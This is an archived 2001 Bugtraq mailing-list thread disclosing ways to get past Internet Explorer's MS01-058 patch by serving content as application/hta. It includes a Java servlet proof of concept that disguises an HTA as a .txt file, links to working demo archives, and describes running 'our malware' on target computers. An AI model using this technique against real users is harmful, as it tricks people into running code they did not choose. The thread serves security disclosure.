RE: MSIE may download and run progams automatically - NOT SO FAST

["jelmer" <jelmer () kuperus xs4all nl>]

Here's another way to go about it (without the use of mhtml files)

  package nl.xs4all.kuperus.exploits;
  
  import javax.servlet.http.HttpServlet;
  import javax.servlet.http.HttpServletRequest;
  import javax.servlet.http.HttpServletResponse;
  import javax.servlet.ServletException;
  import java.io.IOException;
  import java.io.PrintWriter;
  
  public class SpoofIt extends HttpServlet {
  
      protected void doGet(HttpServletRequest request,
HttpServletResponse response) throws ServletException, IOException {
  
          response.setContentType("application/hta");
          response.setStatus(201);
  
          PrintWriter out = response.getWriter();
          out.write("this is a hta");
  
      }
  
      protected void doPost(HttpServletRequest request,
HttpServletResponse response) throws ServletException, IOException {
          super.doGet(request, response);
      }
  }

Once the user clicks on open the hta file is started according to its
mime type
Application/hta. all the time the user is thinking it is actually a .txt
file

On ie 5.5 this works even without the response code set to 200
On ie 6 with all patches in place including the latest 'mega pack :)'
you have to set the
content type to something other then 200 or the hta extension will show

A working example is available at

http://kuperus.xs4all.nl/microsoft.txt




-----Original Message-----
From: http-equiv () excite com [mailto:http-equiv () excite com] 
Sent: zondag 16 december 2001 1:30
To: bugtraq () securityfocus com
Subject: Re: MSIE may download and run progams automatically - NOT SO
FAST

Saturday, December 15, 2001

"Jouko Pynnonen" <jouko () solutions fi> wrote in message 
  
> VENDOR STATUS
>
> Microsoft was initially contacted on November 19th with the
information
> regarding the "file extension spoofing" problem. The Security Warning
> dialogs of IE5 could be bypassed with that exploit, but the
"automatically
> start an .exe" variation of the vulnerability wasn't known at the
time.
> Microsoft didn't consider the file extension spoofing problem a
security
> vulnerability. The company was informed about the new variation on
> November 27th and started working on a patch to correct the flaw. The
> patch is now out and downloadable on Microsoft's site at
>
> http://www.microsoft.com/technet/security/bulletin/MS01-058.asp

She and her beta team forgot about *the* most important Content-Type: 

Clearly what this so-called "patch" does is convert all embedded file
types
in MHTML documents viewed in patched Internet Explorer 6 into *.TMP
files.
Previously all file types and file names were retained and if accepted
would
run.

What that means is when prompted for 'opening or saving', [screen shot:
http://www.malware.com/dumbload.jpg 14KB], if your hand should slip or
if
you do not know any better and select 'open', because the file extension
is
*.TMP, you will be asked 'what do you want to open the file with'
(screen
shot: http://www.malware.com/sesame.jpg 20KB) which does indeed kill any
accidental or running of the file.

Working example:

[open in IE6 "patched"]

http://www.malware.com/badman.zip 11KB

Before the patch and under an MTHML file situated on the web site and
viewed
with Internet Explorer 6, you would be in a position to manipulate the
file
extension and download box as displayed here: 
[screen shot: http://www.malware.com/ohno.jpg 27KB] 

Now with the so-called "patch", regardless of the filename="malware.exe"
or
the Content-Type: image/gif; combination, everything is effectively
converted to a *.TMP file in the Temporary Internet File. Attempting to
open
the *.TMP, depending on what it is will either bring up the 'what do you
want to open the file with' box, or display the file as plain text.

Dangerous files such as *.exe or *.scr or *.bat simply will not run if
you
elect to run the file through the Internet Explorer 6 patched browser.
Sounds good.

Unfortunately, while she did a fairly reasonable job on this so-called
"patch" she forgot one of the most important content-types. Her very own
invention. The one and only:

Content-Type: application/hta;

We are still able to invoke a download, that if accepted will execute
our
malware on the target computer, through the "patched" Internet Explorer
6.

This newly found creation of download file conversion through MHTML to
generic *.TMP file name on the download box coupled with the 'supposed'
security of this so-called "patch" will most definitely yield plenty of
quick prey:

Working Example:

[self explanatory includes harmless *.exe, open in IE6 "patched"]

http://www.malware.com/dumbload.zip 4KB

Notes:

1. We note that this patch has zero effect on Outlook Express 6 and the
ability to "spoof" file names [see:
http://www.securityfocus.com/bid/3271].
Coming up 17 months and counting now.
2. Workhorse: Windows 98 and Internet Explorer 6.0.2600 and this
so-called
"patch".
3. Seasons Greetings to Everyone. Yeah you too, incompetent slobs.

End Call

---
http://www.malware.com





________________________________________________________________________
______
Send a friend your Buddy Card and stay in contact always with Excite
Messenger
http://messenger.excite.com